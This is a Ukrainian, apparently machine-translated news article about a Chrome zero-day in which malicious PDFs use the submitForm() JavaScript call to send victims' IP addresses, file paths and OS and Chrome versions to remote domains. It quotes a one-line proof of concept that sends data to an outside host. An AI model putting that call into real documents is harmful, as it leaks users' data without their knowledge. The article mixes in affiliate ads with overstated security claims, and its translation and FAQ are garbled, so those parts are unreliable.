- EdgeSpot виявив інтригуючу вразливість нульового дня, використовуючи документи PDF у Chrome.
- Це вразливість може нашкодити вам, збираючи конфіденційні дані на вашому ПК.
- Дослідіть наш Сторінка Інтернету та хмари для отримання додаткової інформації про інші інструменти та послуги.
- Якщо ви зацікавлені в браузерах, ми надаємо багато інформації про них у нашому Центр браузерів.
Зробіть усі свої документи доступними та безпечними за допомогою Adobe Acrobat Reader. Цей інструмент управління документами також дозволить вам підписувати електронне повідомлення та створювати офіційні форми, щоб заощадити ваш час на роботі. Отримайте його для свого ПК, і ви зможете:
- Відкривайте, друкуйте та редагуйте всі PDF-файли та інші типи файлів
- Простіше заповнювати PDF-форми
- Зберігайте свої основні документи в зашифрованому вигляді
Отримайте всі програми за спеціальною ціною!
Світове програмне забезпечення для управління документами № 1 зараз має велику ціну, тож поспішайте!
Служба виявлення експлоїтів EdgeSpot виявила інтригуючу Chrome нульовий день уразливості, що використовує документи PDF.
Уразливість дозволяє зловмисникам збирати конфіденційні дані за допомогою шкідливих документів PDF, відкритих у Chrome.
Як тільки жертва відкриває відповідні файли PDF у Google Chrome, шкідлива програма починає працювати у фоновому режимі, збираючи дані користувачів.
Далі дані передаються на віддалений сервер, який контролюється хакерами. Можливо, вам цікаво, які дані всмоктують зловмисники, вони націлюють такі дані на ваш ПК:
- IP-адреса
- Повний шлях PDF-файлу до системи
- Версії ОС та Chrome
Остерігайтеся шкідливого програмного забезпечення PDF-файлів
Експерти плямистий що один із двох доменів readnotify [.] com або burpcollaborator [.] net отримував дані.
Вони виявили, що зловмисники використовують this.submitForm () PDF Javascript API для збору конфіденційної інформації користувачів.
Ми протестували його з мінімальним PoC, простим викликом API this.submitForm (‘ http://google.com/test’) змусить Google Chrome надсилати особисті дані на google.com.
Цю помилку Chrome використовували два окремі набори шкідливих файлів PDF, обидва з яких розповсюджувались у жовтні 2017 року та вересні 2018 року, відповідно.
Примітно, що зібрані дані можуть бути використані зловмисниками для точної настройки атак у майбутньому. Звіти показують, що перша партія файлів була скомпільована за допомогою служби відстеження PDF ReadNotify.
Користувачі можуть використовувати службу для відстеження переглядів користувачів. EdgeSpot не повідомляє ніяких подробиць щодо характеру другого набору файлів PDF.
Швидка порада: змініть браузер на Opera
У ці неспокійні часи на нас нападають зловмисне програмне забезпечення, фішинг та трояни на кожному кроці, тому ми повинні бути набагато пильнішими та залишатися захищеними.
Оскільки це проблема, характерна для Chrome, ви можете уникнути цієї загрози та всіх інших за допомогою браузера, орієнтованого на безпеку Опера.
Цей браузер має вбудований блокувальник реклами, який не тільки прибирає такі відволікаючі фактори, але й блокує сценарії аналітики, пікселі відстеження та методи збору ваших даних.
І якщо ви хочете бути абсолютно впевненими, що тримаєтесь подалі від будь-якої небезпеки, відійдіть за вбудований VPN послугу, якою на 100% можна користуватися необмежений час.
Опера
Opera пропонує ідеальний захист від загроз завдяки вбудованому блокувальнику реклами та послузі VPN безкоштовно!
Відвідайте веб-сайт
Як я можу бути захищеним від уразливостей PDF?
Завантажте Adobe Acrobat PRO
Adobe і Chrome добре поєднуються в обробці файлів PDF. Встановивши розширення Adobe для Chrome, ви можете переглядати та обробляти PDF-файли на свій смак, не виходячи з улюбленого браузера.
Незважаючи на надійну структуру, шкідливе програмне забезпечення, приховане у файлах PDF, може не виявитись, якщо ви використовуєте стандартну версію Reader.
Рекомендується професійна версія, щоб гарантувати ваш захист та захистити ваші дані від хакерів.
Хоча це не безкоштовно, ціна, яку ви заплатите, досить мала за безліч додаткових функцій, які вам сподобаються, включаючи посилений захист ваших PDF-файлів.
Також є 7-денна безкоштовна пробна версія, щоб ви могли спробувати весь досвід Pro перед тим, як зробити покупку.
Adobe Acrobat PRO
Тримайтеся подалі від шкідливих програм, завантаживши Adobe Acrobat PRO. Він має набагато більше можливостей, ніж безкоштовна версія, і захищає ваші дані.
Відвідайте веб-сайт
Якщо ви хочете бути в безпеці під час серфінгу в Інтернеті, вам потрібно буде отримати повністю спеціальний інструмент для захисту вашої мережі. Встановіть приватний доступ до Інтернету зараз і захистити себе. Він захищає ваш ПК від атак під час перегляду веб-сторінок, маскує вашу IP-адресу та блокує весь небажаний доступ.
Служба виявлення експлоїтів EdgeSpot хотіла попередити користувачів Chrome про потенційні ризики, оскільки не очікувалося, що патч буде випущений найближчим часом.
EdgeSpot повідомив Google про вразливість минулого року, і компанія пообіцяла випустити патч наприкінці квітня.
Однак ви можете розглянути можливість використання тимчасового способу вирішення проблеми, переглянувши отримані документи PDF локально, використовуючи інший додаток для читання.
Крім того, ви можете також відкрити свої документи PDF у Chrome, відключивши ваші системи від Інтернету.
Питання що часто задаються
Так. Але якщо ви хочете розширити вибір, вивчіть наші найкращі вибори Chromeконфіденційність розширення в це повне керівництво.
Ттут багато розширень, які дозволяють PDF-файли обробка. Перевірте з нашого чудовий гід про найкращі розширення PDF для Chrome.
Це не так, але ви можете швидко його активувати. Ось наш всебічне керівництво про те, як увімкнути генератор QR-коду в Chrome.